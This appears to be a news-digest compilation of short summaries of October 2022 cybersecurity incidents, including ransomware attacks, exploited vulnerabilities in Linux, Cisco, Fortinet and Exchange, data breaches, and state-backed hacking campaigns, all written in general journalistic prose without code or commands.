    CISA Tells Organizations to Patch Linux Kernel Vulnerability Exploited by Malware

    The vulnerability is tracked as CVE-2021-3493 and it’s related to the OverlayFS file system implementation in the Linux kernel. It allows an unprivileged local user to gain root privileges, but it only appears to affect Ubuntu. CVE-2021-3493 has been exploited in the wild by a stealthy Linux malware named Shikitega, which researchers at AT&T Alien Labs detailed in early September. Shikitega is designed to target endpoints and IoT devices running Linux, allowing the attacker to gain full control of the system. It has also been used to download a cryptocurrency miner onto the infected device.

    Health System Data Breach Due to Meta Pixel Hits 3 Million Patients

    Advocate Aurora Health (AAH), a 26-hospital healthcare system in Wisconsin and Illinois, is notifying its patients of a data breach that exposed the personal data of 3,000,000 patients. The incident was caused by the improper use of Meta Pixel on AAH's websites, where patients log in and enter sensitive personal and medical information. Meta Pixel is a JavaScript tracker that helps website operators understand how visitors interact with the site, helping them make targeted improvements. However, the tracker also sends sensitive data to Meta (Facebook), which is then shared with a massive network of marketers who target patients with advertisements that match their conditions.

    BlackByte Ransomware Uses New Data Theft Tool for Double-Extortion

    A BlackByte ransomware affiliate is using a new custom data stealing tool called 'ExByte' to steal data from compromised Windows devices quickly. Data exfiltration is believed to be one of the most important functions in double-extortion attacks, with BleepingComputer being told that companies are more commonly paying ransom demands to prevent the leak of data than to receive a decryptor. Due to this, ransomware operations, including ALPHV and LockBit, are constantly working on improving their data theft tools.

    Multiple Vulnerabilities in Cisco Products, 10-17-2022

    Cisco has released information regarding several vulnerabilities impacting multiple products on October 17, 2022. Please see the links below for more information:

    • Cisco Identity Services Engine Cross-Site Scripting Vulnerability
    • Cisco TelePresence Collaboration Endpoint and RoomOS Software Vulnerabilities
    • Cisco Jabber Client Software Extensible Messaging and Presence Protocol Stanza Smuggling Vulnerability
    • Cisco Identity Services Engine Unauthorized File Access Vulnerability
    • Cisco Meraki MX and Z3 Teleworker Gateway VPN Denial of Service Vulnerability

    Vulnerabilities in Cisco Identity Services Engine require your attention (CVE-2022-20822, CVE-2022-20959)

    Cisco Identity Services Engine is a policy management and access control platform for network devices and is a crucial element of an organization’s zero-trust architecture. Cisco has published a heads-up for admins of Cisco Identity Services Engine solutions about two vulnerabilities (CVE-2022-20822, CVE-2022-20959) that could be exploited to read and delete files on an affected device, execute arbitrary scripts, or access sensitive information. Both vulnerabilities were discovered and reported by Davide Virruso, a freelance bug hunter and a red team operator at managed security service provider Yoroi.

    NCSC CEO Calls for International Standards on IoT Security

    In a speech during Singapore’s International Cyber Week, NCSC CEO Lindy Cameron called for international standards to improve IoT security. “At every level, individual households, businesses, cities and local governments are keen to reap the benefits of ‘smart devices.’ The benefits are obviously compelling. They provide a range of critical functions and services to us all. This should be an opportunity, not a threat,” outlined Cameron. She pointed at Singapore, a country that has taken major strides in the use of connected devices to manage vital services, such as transport, waste, CCTV, streetlights, traffic lights, parking and emergency services.

    Internet Connectivity Worldwide Impacted by Severed EU Subsea Cables

    A major internet subsea fiber cable in the South of France was severed yesterday at 20:30 UTC, causing connectivity problems in Europe, Asia, and the United States, including data packet losses and increased website response latency. Cloud security company Zscaler reports that they made routing adjustments to mitigate the impact. However, users still face problems due to app and content providers routing traffic through the impacted paths.

    Hackers Use New Stealthy PowerShell Backdoor to Target 60+ Victims

    A previously undocumented, fully undetectable PowerShell backdoor is being actively used by a threat actor who has targeted at least 69 entities. Based on its features, the malware is designed for cyberespionage, mainly engaging in data exfiltration from the compromised system. When first detected, the PowerShell backdoor was not seen as malicious by any vendors on the VirusTotal scanning service. However, its cover was blown due to operational mistakes by the hackers, allowing SafeBreach analysts to access and decrypt commands sent by the attackers to execute on infected devices.

    Researchers Share Details of FabriXss Bug Impacting Azure Fabric Explorer

    Orca Security researchers have released technical details about a now-patched FabriXss vulnerability, tracked as CVE-2022-35829 (CVSS 6.2), that impacts Azure Fabric Explorer. An attacker can exploit the vulnerability to gain administrator privileges on the cluster. In order to exploit this flaw, an attacker needs to have CreateComposeDeployment permission. Orca Security reported the flaw to Microsoft in August 2022 and the company addressed it with the release of the October 2022 Patch Tuesday updates.

    Ransom Cartel Linked to Notorious REvil Ransomware Operation

    Researchers have linked the relatively new Ransom Cartel ransomware operation with the notorious REvil gang based on code similarities in both operations' encryptors. REvil reached its pinnacle of success in the first half of 2021, compromising thousands of companies in a Kaseya MSP supply-chain attack, demanding a $50 million payment from computer maker Acer, and extorting Apple using stolen blueprints of not-yet-released devices.

    Microsoft Office 365 Message Encryption (OME) Doesn’t Ensure Confidentiality

    Researchers at the cybersecurity firm WithSecure discovered a weakness in the message encryption mechanism used by Microsoft in Office 365 that can allow third parties to infer message contents. The experts pointed out that Microsoft Office 365 Message Encryption (OME) relies on the Electronic Codebook (ECB) mode of operation. ECB mode is considered insecure because identical plaintext blocks produce identical ciphertext blocks, so it can reveal the structure of the messages sent, potentially leading to partial or full message disclosure. The OME method is used to send and receive encrypted email messages, and the vulnerability can allow attackers to decipher the content of encrypted emails.

    Apache Commons Text Flaw Is Not a Repeat of Log4shell

    A freshly fixed vulnerability (CVE-2022-42889) in the Apache Commons Text library has been getting attention from security researchers these last few days, worrying it could lead to a repeat of the Log4Shell dumpster fire. But the final verdict shows there’s no need to panic: while the vulnerability is exploitable, “The nature of the vulnerability means that, unlike Log4Shell, it will be rare that an application uses the vulnerable component of Commons Text to process untrusted, potentially malicious input,” said Rapid7 AI researcher Erick Galinkin.

    Verizon Notifies Prepaid Customers Their Accounts Were Breached

    Verizon warned an undisclosed number of prepaid customers that attackers gained access to Verizon accounts and used exposed credit card info in SIM swapping attacks. "We determined that between October 6 and October 10, 2022, a third-party actor accessed the last four digits of the credit card used to make automatic payments on your account."

    FBI: Scammers Likely to Target US Student Loan Debt Relief Applicants

    The FBI has released a warning that scammers may be targeting individuals seeking to enroll in the Federal Student Aid program to steal their personal information, payment details, and money. Federal Student Aid is a debt relief program announced in August 2022 that opened for applications yesterday. The large number of applicants presents a unique targeting opportunity for cybercriminals, who will use various techniques to trick applicants into falling for fraudulent websites and phishing emails. Users should be on the lookout for phishing emails and SMS messages that mimic the application form for student loan relief.

    Ransomware Attack Halts Circulation of Some German Newspapers

    German newspaper ‘Heilbronn Stimme’ published today’s 28-page issue in e-paper form after a Friday ransomware attack crippled its printing systems. On Saturday, the newspaper issued an “emergency” six-page edition while all planned obituaries were posted on the website. Phone and email communication remained offline during the weekend. The regional publication has a circulation of about 75,000 copies, but due to printing issues has temporarily lifted the paywall from its website, which counts approximately 2 million visitors per month.

    Malware Dev Claims to Sell New BlackLotus Windows UEFI Bootkit

    A threat actor is selling on hacking forums what they claim to be a new UEFI bootkit named BlackLotus, a malicious tool with capabilities usually linked to state-backed threat groups. UEFI bootkits are planted in the system firmware. They are invisible to security software running within the operating system because the malware loads in the initial stage of the booting sequence. While cybercriminals who want a license for this Windows bootkit have to pay $5,000, the threat actor says rebuilds would only set them back $200.

    Pro-Russia Hackers DDoS Bulgarian Government

    A wave of DDoS attacks rocked the Bulgarian government over the weekend, with Russia the prime suspect, according to reports. Traffic flooded the websites of the Bulgarian President, the National Revenue Agency, and the ministries of internal affairs, defense, and justice, according to several local reports. Telecoms firms, airports, banks and some media companies were also targeted in the October 15 campaign, according to the Sofia Globe.

    Chinese 'Spyder Loader' Malware Spotted Targeting Organizations in Hong Kong

    The China-aligned espionage-focused actor dubbed Winnti has set its sights on government organizations in Hong Kong as part of an ongoing campaign dubbed Operation CuckooBees. Active since at least 2007, Winnti (aka APT41, Barium, Bronze Atlas, and Wicked Panda) is the name designated to a prolific cyber threat group that carries out Chinese state-sponsored espionage activity, predominantly aimed at stealing intellectual property from organizations in developed economies.

    Critical Remote Code Execution Issue Impacts Popular Post-exploitation Toolkit Cobalt Strike

    HelpSystems addressed a critical remote code execution vulnerability in their commercial post-exploitation toolkit Cobalt Strike. The vulnerability is tracked as CVE-2022-42948, and allows a remote attacker to take control of a targeted system. By manipulating some client-side UI input fields, threat actors can simulate a Cobalt Strike implant check-in, or hook the implant running on a host.

    Threat Actors Hacked Hundreds of Servers by Exploiting Zimbra CVE-2022-41352 Bug

    Last week, researchers from Rapid7 warned of the exploitation of an unpatched zero-day remote code execution vulnerability, tracked as CVE-2022-41352, in the Zimbra Collaboration Suite. Rapid7 has published technical details, including proof-of-concept (PoC) code and indicators of compromise (IoCs) regarding CVE-2022-41352 on AttackerKB. The issue has been rated as CVSS 9.8 (Security Affairs, 2022). “CVE-2022-41352 is an unpatched remote code execution vulnerability in Zimbra Collaboration Suite discovered in the wild due to active exploitation,” reported Rapid7.

    Black Basta Ransomware Hackers Infiltrate Networks via Qakbot to Deploy Brute Ratel C4

    The threat actors behind the Black Basta ransomware family have been observed using the Qakbot trojan to deploy the Brute Ratel C4 framework as a second-stage payload in recent attacks. The development marks the first time the nascent adversary simulation software has been delivered via a Qakbot infection, cybersecurity firm Trend Micro said in a technical analysis released last week. The intrusion, achieved using a phishing email containing a weaponized link pointing to a ZIP archive, further entailed the use of Cobalt Strike for lateral movement. While these legitimate utilities are designed for conducting penetration testing activities, their ability to offer remote access has made them a lucrative tool in the hands of attackers looking to stealthily probe the compromised environment without attracting attention for extended periods of time.

    Mysterious Prestige Ransomware Targets Organizations in Ukraine and Poland

    Microsoft reported that new Prestige ransomware is being used in attacks aimed at transportation and logistics organizations in Ukraine and Poland. The Prestige ransomware first appeared in the threat landscape on October 11 in attacks occurring within an hour of each other across all victims. A notable feature of this campaign is that it is uncommon to observe threat actors attempting to deploy ransomware into the networks of Ukrainian enterprises. Microsoft pointed out that this campaign was not connected to any of the 94 currently active ransomware activity groups that it is tracking.

    Venus Ransomware Targets Publicly Exposed Remote Desktop Services

    Threat actors behind the relatively new Venus Ransomware are hacking into publicly-exposed Remote Desktop services to encrypt Windows devices. Venus Ransomware appears to have begun operating in the middle of August 2022 and has since encrypted victims worldwide. However, there was another ransomware using the same encrypted file extension since 2021, but it is unclear if they are related.

    Everything We Know About the Mango Markets Hack

    Mango Markets is a trading platform riding on the Solana blockchain. Mango Markets says that the platform halted operations to cease all deposits and withdrawals to limit the attack's impact. "This incident has effectively resulted in a total draining of all equity available." The hacker who stole $117 million in digital assets from the decentralized finance exchange says they will now return the funds, but only if token holders let them keep $70 million without the possibility of criminal prosecution.

    Malware Infects Over 800 Corporate Users in New, Ongoing Campaign

    Between September 28 and October 7, Kaspersky observed close to 1,800 users infected with QBot worldwide. More than half of the new victims are corporate users. According to security researchers, the United States, Italy, Germany, and India are the countries targeted the most in these recent campaigns. Out of a total of 220 victims in the United States, 95 are corporate users, potentially exposing their organizations to further malicious activity, including distributing ransomware and other malware families.

    Polonium APT Targets Israel With a New Custom Backdoor Dubbed Papacreep

    MSTIC has observed POLONIUM active on or targeting multiple organizations previously compromised by the Iran-linked MuddyWater APT (aka MERCURY). According to Microsoft, POLONIUM is an APT group based in Lebanon that coordinates its activities with other actors affiliated with the Iranian Ministry of Intelligence and Security. Now ESET researchers have reported that the APT group has used at least seven different custom backdoors since September 2021 against Israeli targets. Most of the attacks were spotted in September 2022, and the custom tools developed by the group allowed them to spy on the victims.

    New NPM Timing Attack Could Lead To Supply Chain Attacks

    Security researchers have discovered an NPM timing attack that reveals the names of private packages so threat actors can release malicious clones publicly to trick developers into using them instead. The attack relies on a slight time difference in returning a "404 Not Found" error when searching for a private package compared to a non-existent package in the repository. While the response time difference is only a few hundred milliseconds, it is enough to determine whether a private package exists and so to perform package impersonation attacks. Organizations create private packages for internal projects and certain software products to minimize the risk of their development teams falling for typosquatting attacks and to keep their code and functions secret.

    New Alchimist Attack Framework Targets Windows, macOS, Linux

    Cybersecurity researchers have discovered a new attack and C2 framework called 'Alchimist,' which appears to be actively used in attacks targeting Windows, Linux, and macOS systems. The framework and all its files are 64-bit executables written in Go (Golang), a programming language that makes cross-compilation for different operating systems a lot easier. Alchimist offers a web-based interface in Simplified Chinese, and it's very similar to Manjusaka, a recently emerged post-exploitation attack framework growing popular among Chinese hackers.

    VMware vCenter Server Bug Disclosed Last Year Still Not Patched

    VMware informed customers today that vCenter Server 8.0 (the latest version) is still waiting for a patch to address a high-severity privilege escalation vulnerability disclosed in November 2021. The security flaw (CVE-2021-22048), found by CrowdStrike's Yaron Zinar and Sagi Sheinfeld in vCenter Server's IWA (Integrated Windows Authentication) mechanism, also affects VMware's Cloud Foundation hybrid cloud platform deployments. Attackers with non-administrative access can exploit it to elevate privileges to a higher privileged group on unpatched servers.

    Google Forms Abused in New COVID-19 Phishing Wave in the U.S.

    In the latest attacks, phishing emails impersonate the U.S. Small Business Administration (SBA) and abuse Google Forms to host phishing pages that steal the personal details of business owners. The SBA ran COVID-19 financial recovery programs in the past, which adds legitimacy to the campaign, especially for previous beneficiaries. However, the organization is currently not running any similar initiatives.

    Microsoft October 2022 Patch Tuesday Fixes Zero-Day Used in Attacks, 84 Flaws

    As part of the October Patch Tuesday, Microsoft addressed 84 vulnerabilities, including two zero-days (one of which is actively being exploited in attacks in the wild). Of the 84 flaws, there were 39 elevation of privilege vulnerabilities, 2 security feature bypass vulnerabilities, 20 remote code execution vulnerabilities, 11 information disclosure vulnerabilities, 8 denial of service vulnerabilities, and 4 spoofing vulnerabilities. 13 of the 84 flaws have been rated critical in severity and relate to spoofing, privilege elevation, and remote code execution.

    Claroty Found Hardcoded Cryptographic Keys in Siemens PLCs Using RCE

    Team82, the research arm of New York-based industrial cybersecurity firm Claroty, revealed on October 11, 2022, that they managed to extract heavily guarded, hardcoded cryptographic keys embedded within SIMATIC S7-1200/1500s, a range of Siemens programmable logic controllers (PLCs), and TIA Portal, Siemens’ automated engineering software platform.

    Fortinet Says Critical Auth Bypass Bug Is Exploited in Attacks

    Fortinet has confirmed today that a critical authentication bypass security vulnerability patched last week is being exploited in the wild. The security flaw (CVE-2022-40684) is an auth bypass on the administrative interface that enables remote threat actors to log into FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager (FSWM) on-premise management instances.

    Hackers Behind IcedID Malware Attacks Diversify Delivery Tactics

    The threat actors behind IcedID malware phishing campaigns are utilizing a wide variety of distribution methods, likely to determine what works best against different targets. Researchers at Team Cymru have observed several campaigns in September 2022, all following slightly different infection pathways, which they believe is to help them evaluate effectiveness. Moreover, the analysts have noticed changes in the management of command and control server (C2) IPs used in the campaigns, now showing signs of sloppiness.

    Caffeine Service Lets Anyone Launch Microsoft 365 Phishing Attacks

    A phishing-as-a-service (PhaaS) platform named 'Caffeine' makes it easy for threat actors to launch attacks, featuring an open registration process allowing anyone to jump in and start their own phishing campaigns. Caffeine doesn't require invites or referrals, nor does it require wannabe threat actors to get approval from an admin on Telegram or a hacking forum. Due to this, it removes much of the friction that characterizes almost all platforms of this kind. Another distinctive characteristic of Caffeine is that its phishing templates target Russian and Chinese platforms, whereas most PhaaS platforms tend to focus on lures for Western services.

    Toyota Discloses Data Leak After Access Key Exposed on GitHub

    Toyota Motor Corporation is warning that customers' personal information may have been exposed after an access key was publicly available on GitHub for almost five years. Toyota T-Connect is the automaker's official connectivity app that allows owners of Toyota cars to link their smartphone with the vehicle's infotainment system for phone calls, music, navigation, notifications integration, driving data, engine status, fuel consumption, and more. Toyota discovered recently that a portion of the T-Connect site source code was mistakenly published on GitHub and contained an access key to the data server that stored customer email addresses and management numbers.

    Pro-Russian Group KillNet Claims Responsibility for 14 US Airport DDoS Attacks

    On Monday, October 10, 2022, the websites of several US airports were disrupted due to a large-scale campaign of distributed denial-of-service (DDoS) attacks, in which servers were flooded with web traffic to knock websites offline. The victims include Los Angeles International Airport (LAX), Hartsfield-Jackson Atlanta International Airport (ATL), Chicago O'Hare International Airport (ORD), as well as other airports in Florida, Colorado, Arizona, Kentucky, Mississippi and Hawaii.

    LilithBot Malware, A New MaaS Offered by the Eternity Group

    Zscaler researchers linked a recently discovered sample of a new malware called LilithBot to the Eternity group (aka EternityTeam; Eternity Project). The Eternity group operates a homonymous malware-as-a-service (MaaS) and is linked to the Russian “Jester Group,” which has been active since at least January 2022.

    US Healthcare Giant CommonSpirit Hit by Possible Ransomware

    One of the largest non-profit healthcare providers in the US has been hit by a suspected ransomware attack which has already impacted multiple locations around the country. CommonSpirit claims to run over 1000 sites and 140 hospitals in 21 states. In a brief message yesterday it said it had “identified an IT security issue” affecting some facilities.

    Fortinet Warns Admins to Patch Critical Auth Bypass Bug Immediately

    Fortinet has warned administrators to update FortiGate firewalls and FortiProxy web proxies to the latest versions, which address a critical severity vulnerability. The security flaw (tracked as CVE-2022-40684) is an authentication bypass on the administrative interface that could allow remote threat actors to log into unpatched devices.

    Govt Shares Top Flaws Exploited by Chinese Hackers Since 2020

    NSA, CISA, and the FBI revealed today the top security vulnerabilities most exploited by hackers backed by the People's Republic of China (PRC) to target government and critical infrastructure networks. The three federal agencies said in a joint advisory that Chinese-sponsored hackers are targeting U.S. and allied networks and tech companies to gain access to sensitive networks and steal intellectual property.

    Lofygang Hackers Built a Credential-Stealing Enterprise on Discord, NPM

    The 'LofyGang' threat actors have created a credential-stealing enterprise by distributing 200 malicious packages and fake hacking tools on code hosting platforms, such as NPM and GitHub. Researchers highlighted some of these packages in recent reports by Kaspersky, JFrog, and Sonatype, who spotted them in supply chain attacks using typosquatted package names. Many malicious packages have been reported and removed, while others are still available for download. There's even a dedicated project to search for and track malicious LofyGang packages on GitHub. A bot on Discord, named "Lofy Boost," can be used by channel members to purchase Nitro using a stolen credit card on behalf of the user. The bot also receives user tokens, which the crooks may abuse later. The stash of stolen credit cards comes from NPM supply chain infections and from pushing laced and backdoored hacking tools on GitHub, which less skilled cybercriminals grab and use free of charge.

    Police Arrest Teen for Using Leaked Optus Data to Extort Victims

    The Australian Federal Police (AFP) have arrested a 19-year-old in Sydney for allegedly using leaked Optus customer data for extortion. More specifically, the suspect used 10,200 records leaked last month by the Optus hackers and contacted victims over SMS to threaten that their data would be sold to other hackers unless they paid AUD 2,000 ($1,300) within two days. The scammer used a Commonwealth Bank of Australia account to receive the ransom money. The AFP identified the account and obtained information about the holder from the bank.

    Details Released for Recently Patched macOS Archive Utility Vulnerability

    Security researchers have shared details about a now-addressed security flaw in Apple's macOS operating system that could be potentially exploited to run malicious applications in a manner that bypasses Apple's security measures. The vulnerability, tracked as CVE-2022-32910, is rooted in the built-in Archive Utility and "could lead to the execution of an unsigned and unnotarized application without displaying security prompts to the user, by using a specially crafted archive."

    Telstra Discloses Data Breach Impacting Former and Current Employees

    Australia’s largest telecommunications company, Telstra, disclosed a data breach through a third-party supplier. The company pointed out that its own systems have not been breached; the security breach impacted a third-party supplier that previously provided a now-obsolete Telstra employee rewards program (Security Affairs, 2022). This story comes just after another Australian telecom, Optus, suffered a severe cyber attack that leaked customer data.

    Avast Releases Free Decryptor for Hades Ransomware Variants

    Avast has released a decryptor for variants of the Hades ransomware known as 'MafiaWare666', 'Jcrypt,' 'RIP Lmao', and 'BrutusptCrypt,' allowing victims to recover their files for free. The security company says it discovered a flaw in the encryption scheme of the Hades strain, allowing some of the variants to be unlocked. However, this may not apply to newer or unknown samples that use a different encryption system.

    BlackByte Ransomware Abuses Legit Driver to Disable Security Products

    The BlackByte ransomware gang is using a new technique that researchers are calling "Bring Your Own Driver," which enables bypassing protections by disabling more than 1,000 drivers used by various security solutions. Recent attacks attributed to this group involved a version of the MSI Afterburner RTCore64.sys driver, vulnerable to a privilege escalation and code execution flaw tracked as CVE-2019-16098.

    Netwalker Ransomware Affiliate Sentenced to 20 Years in Prison

    Former Netwalker ransomware affiliate Sebastien Vachon-Desjardins has been sentenced to 20 years in prison and ordered to forfeit $21.5 million for his attacks on a Tampa company and other entities. Vachon-Desjardins, a 34-year-old Canadian man extradited from Quebec, was sentenced today in a Florida court after pleading guilty to 'Conspiracy to Commit Computer Fraud,' 'Conspiracy to Commit Wire Fraud,' 'Intentional Damage to Protected Computer,' and 'Transmitting a Demand in Relation to Damaging a Protected Computer.' He is also required to serve three years of supervised release after he gets out of prison. During this term, Vachon-Desjardins will not be allowed to have a job in information technology or use a computer capable of connecting to the Internet, including a smartphone, gaming device, or other electronic devices.

    Optus Confirms 2.1 Million ID Numbers Exposed in Data Breach

    In a press statement released yesterday, the mobile carrier updated the information regarding the personal data of 9.8 million customers exposed during the attack. Of these, 2.1 million customers had ID numbers exposed: 1.2 million had at least one number from a current and valid form of identification compromised, and 900,000 had ID numbers exposed from documents that are now expired. However, all 9.8 million customers had other personal information exposed, including email addresses, dates of birth, or phone numbers.

    Qakbot: Analysing a Modern-Day Banking Trojan

    QakBot is a banking trojan that has been in development for around 15 years. Over time it has evolved significantly and continues to impact organizations globally. Recently, the malware has been used to spy on financial operations and to install ransomware. Researchers from Menlo Labs shared their QakBot findings after observing several campaigns. QakBot uses various Highly Evasive Adaptive Threat (HEAT) techniques. “HEAT attacks are a new class of attack methods built specifically to avoid detection from common layers in traditional security stacks.”

    New Android Malware 'RatMilad' Can Steal Your Data, Record Audio

    A new Android spyware named 'RatMilad' was discovered targeting mobile devices in the Middle East, used to spy on victims and steal data. The RatMilad spyware was discovered by mobile security firm Zimperium, which warned that the malware could be used for cyber espionage, extortion, or to eavesdrop on victims' conversations. Data stolen by the malware is being used to access private corporate networks, blackmail a victim, and more. The spyware is distributed masquerading as a fake virtual number generator called NumRent, which would be used for automating the activation of social media accounts. The app requests risky permissions, then abuses those to sideload the RatMilad payload onto the device.

    CISA, FBI & NSA Release Advisory on APT Cyber Activity Targeting Defense Industrial Base Orgs

    The U.S. Government yesterday released an alert about state-backed hackers using a custom CovalentStealer malware and the Impacket framework to steal sensitive data from a U.S. organization in the Defense Industrial Base (DIB) sector. According to the report, the compromise lasted for about 10 months, and allowed multiple APT groups to gain initial access through the victim's Microsoft Exchange Server in January of last year. The hackers used a combination of a custom malware called CovalentStealer and an open-source tool called Impacket to carry out their attacks.

    Linux Cheerscrypt Ransomware Is Linked to Chinese Dev-0401 APT Group

    Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10). Bronze Starlight has been active since mid-2021; researchers from Secureworks reported that the APT group is deploying post-intrusion ransomware families to cover up its cyber espionage operations.

    CISA, FBI and NSA Release Advisory on APT Cyber Activity Targeting Defense Industrial Base Orgs

    Today, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA) released a joint Cybersecurity Advisory (CSA) with details on advanced persistent threat (APT) actors using an open-source toolkit and custom data exfiltration tool to steal sensitive data from a defense industrial base (DIB) sector organization’s enterprise network.

    Live support service hacked to spread malware in supply chain attack

    The official installer for the Comm100 Live Chat application, a widely deployed SaaS (software-as-a-service) product that businesses use to communicate with customers and website visitors, was trojanized as part of a new supply-chain attack. A report from CrowdStrike says that the infected variant was available from the vendor's website from at least September 26 until the morning of September 29. Because the trojanized installer used a valid digital signature, antivirus solutions would not trigger warnings during its launch, allowing for a stealthy supply-chain attack.

    Fake Microsoft Exchange ProxyNotShell exploits for sale on GitHub

    Scammers are impersonating security researchers to sell fake proof-of-concept ProxyNotShell exploits for newly discovered Microsoft Exchange zero-day vulnerabilities. Last week, Vietnamese cybersecurity firm GTSC disclosed that some of their customers had been attacked using two new zero-day vulnerabilities in Microsoft Exchange. Working with Trend Micro's Zero Day Initiative, the researchers disclosed the vulnerabilities privately to Microsoft, who confirmed that the bugs were being exploited in attacks and that they were working on an accelerated timeline to release security updates.

    FBI Warns of "Pig Butchering" Cryptocurrency Investment Schemes

    The Federal Bureau of Investigation (FBI) warns of a rise in 'Pig Butchering' cryptocurrency scams used to steal ever-increasing amounts of crypto from unsuspecting investors. The warning was issued as a Private Industry Notification from the FBI Miami Field Office in coordination with the Internet Crime Complaint Center (IC3) yesterday to raise awareness among cryptocurrency investors who are increasingly being targeted by these types of scams.

    Russian Retail Chain ‘DNS’ Confirms Hack After Data Leaked Online

    Russian retail chain 'DNS' (Digital Network System) disclosed yesterday that they suffered a data breach that exposed the personal information of customers and employees. DNS is Russia's second-largest computer and home appliance store chain, with 2,000 branches and 35,000 employees. According to the scant details provided in the announcement, a group of hackers residing outside the Russian Federation exploited a security gap in the company's IT systems and accessed customer and employee details. While the firm has not provided details on what information was compromised, it clarified that the hackers didn't steal user passwords and payment card data, as that data isn't stored on their systems.

    BlackCat Ransomware Gang Claims to Have Hacked U.S. Defense Contractor NJVC

    The ALPHV/BlackCat ransomware gang claims to have breached the IT firm NJVC, which supports the federal government and the United States Department of Defense. The company supports intelligence, defense, and geospatial organizations and has more than 1,200 employees in locations worldwide. BlackCat added NJVC to the list of victims on its Tor leak site and is threatening to release the allegedly stolen data if the company does not pay the ransom: “We strongly recommend that you contact us to discuss your situation. Otherwise, the confidential data in our possession will be released in stages every 12 hours. There is a lot of material,” reads ALPHV’s statement.

    Ransomware Gang Leaks Data Stolen From LAUSD School System

    The Vice Society Ransomware gang published data and documents Sunday morning that were stolen from the Los Angeles Unified School District during a cyberattack earlier this month. LAUSD superintendent Alberto M. Carvalho confirmed the release of stolen data in a statement posted to Twitter and announced a new hotline launching tomorrow morning for concerned parents and students to ask questions about the data leak. The public release of data comes after the school system announced Friday that they would not be giving in to the ransom demands and that the district could better use the money for students and their education.

    Hackers Exploiting Dell Driver Vulnerability to Deploy Rootkit on Targeted Computers

    The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by taking advantage of an exploit in a Dell firmware driver, highlighting new tactics adopted by the state-sponsored adversary. The Bring Your Own Vulnerable Driver (BYOVD) attack, which took place in the autumn of 2021, is another variant of the threat actor's espionage-oriented activity called Operation In(ter)ception that's directed against aerospace and defense industries.

    Ex-NSA Employee Arrested for Trying to Sell U.S. Secrets to a Foreign Government

    A former U.S. National Security Agency (NSA) employee has been arrested on charges of attempting to sell classified information to a foreign spy, who was actually an undercover agent working for the Federal Bureau of Investigation (FBI). Jareh Sebastian Dalke, 30, was employed at the NSA for less than a month from June 6, 2022, to July 1, 2022, serving as an Information Systems Security Designer as part of a temporary assignment in Washington D.C.

    Microsoft Exchange Server Zero-day Mitigation Can be Bypassed

    Last week, Microsoft shared mitigations for two new Microsoft Exchange zero-day vulnerabilities tracked as CVE-2022-41040 and CVE-2022-41082, but researchers warn that the mitigation for on-premise servers is far from enough. Threat actors are already chaining both of these zero-day bugs in active attacks to breach Microsoft Exchange servers and achieve remote code execution in limited attacks. Both security flaws were reported privately through the Zero Day Initiative program about three weeks ago by Vietnamese cybersecurity company GTSC, who shared the details publicly last week.

    Fired Admin Cripples Former Employer’s Network Using Old Credentials

    After being laid off, an IT system administrator disrupted the operations of his former employer, a high-profile financial company in Hawaii, hoping to get his job back. Casey K. Umetsu, aged 40, worked as a network admin for the company between 2017 and 2019, when his employer terminated his contract. The U.S. Department of Justice says in a press release that the defendant pleaded guilty yesterday to accessing his former employer's website and making configuration changes to redirect web and email traffic to external computers: "After using his former employer's credentials to access the company's configuration settings on that website, Umetsu made numerous changes, including purposefully misdirecting web and email traffic to computers unaffiliated with the company, thereby incapacitating the company's web presence and email," according to the U.S. Department of Justice.

    Hacking Group Hides Backdoor Malware Inside Windows Logo Image

    Security researchers have discovered a malicious campaign by the 'Witchetty' hacking group, which uses steganography to hide a backdoor malware in a Windows logo. Witchetty is closely tied to the state-backed Chinese threat actor APT10 (aka 'Cicada'). The group is also considered part of the TA410 operatives, previously linked to attacks against U.S. energy providers.

    Microsoft: Lazarus Hackers are Weaponizing Open-source Software

    Microsoft says the North Korean-sponsored Lazarus threat group is trojanizing legitimate open-source software and using it to backdoor organizations in many industry sectors, such as technology, defense, and media entertainment. The list of open-source software weaponized by Lazarus state hackers to deploy the BLINDINGCAN (aka ZetaNile) backdoor includes PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and the muPDF/Subliminal Recording software installer.

    Hacker Shares How They Allegedly Breached Fast Company’s Site

    We shared this week that Fast Company took its website offline after it was hacked to display stories and push out Apple News notifications containing obscene and racist comments. Today, the hacker shared how they allegedly breached the site. The site today shows a statement from the company confirming it was hacked on Sunday afternoon, followed by an additional hack on Tuesday evening that allowed threat actors to push out racist notifications to mobile devices via Apple News.

    New Malware Backdoors VMware ESXi Servers to Hijack Virtual Machines

    In an incident response engagement earlier this year, security researchers at cyber threat intelligence company Mandiant (acquired by Google) found that an actor suspected to have ties with China used malicious vSphere Installation Bundles (VIBs) to deliver two backdoors, which the researchers named VirtualPita and VirtualPie. With the help of malicious vSphere Installation Bundles, an attacker could install malware on bare-metal hypervisors. Also uncovered was a unique malware sample dubbed VirtualGate, which includes a dropper and a payload.

    Hackers now sharing cracked Brute Ratel post-exploitation kit online

    The Brute Ratel post-exploitation toolkit has been cracked and is now being shared for free across Russian-speaking and English-speaking hacking communities. For those unfamiliar with Brute Ratel C4 (BRC4), it is a post-exploitation toolkit created by Chetan Nayak, an ex-red teamer at Mandiant and CrowdStrike. Similar to Cobalt Strike, Brute Ratel is a toolkit used by red teamers to deploy agents, called badgers, on compromised network devices and use them to execute commands remotely and spread further on a network.

    New Chaos malware infects Windows, Linux devices for DDoS attacks

    A quickly expanding botnet called Chaos is targeting and infecting Windows and Linux devices to use them for cryptomining and launching DDoS attacks. This Go-based malware can also infect various architectures, including x86, x86-64, AMD64, MIPS, MIPS64, ARMv5-ARMv8, AArch64, and PowerPC, used by a wide range of devices from small office/home office routers to enterprise servers. Even though it mainly propagates by attacking devices unpatched against various security vulnerabilities and by SSH brute-forcing, Chaos will also use stolen SSH keys to hijack more devices. It also backdoors hijacked devices by establishing a reverse shell that will allow the attackers to reconnect at any time for further exploitation.

    What Telcos Should Learn from the Optus Breach

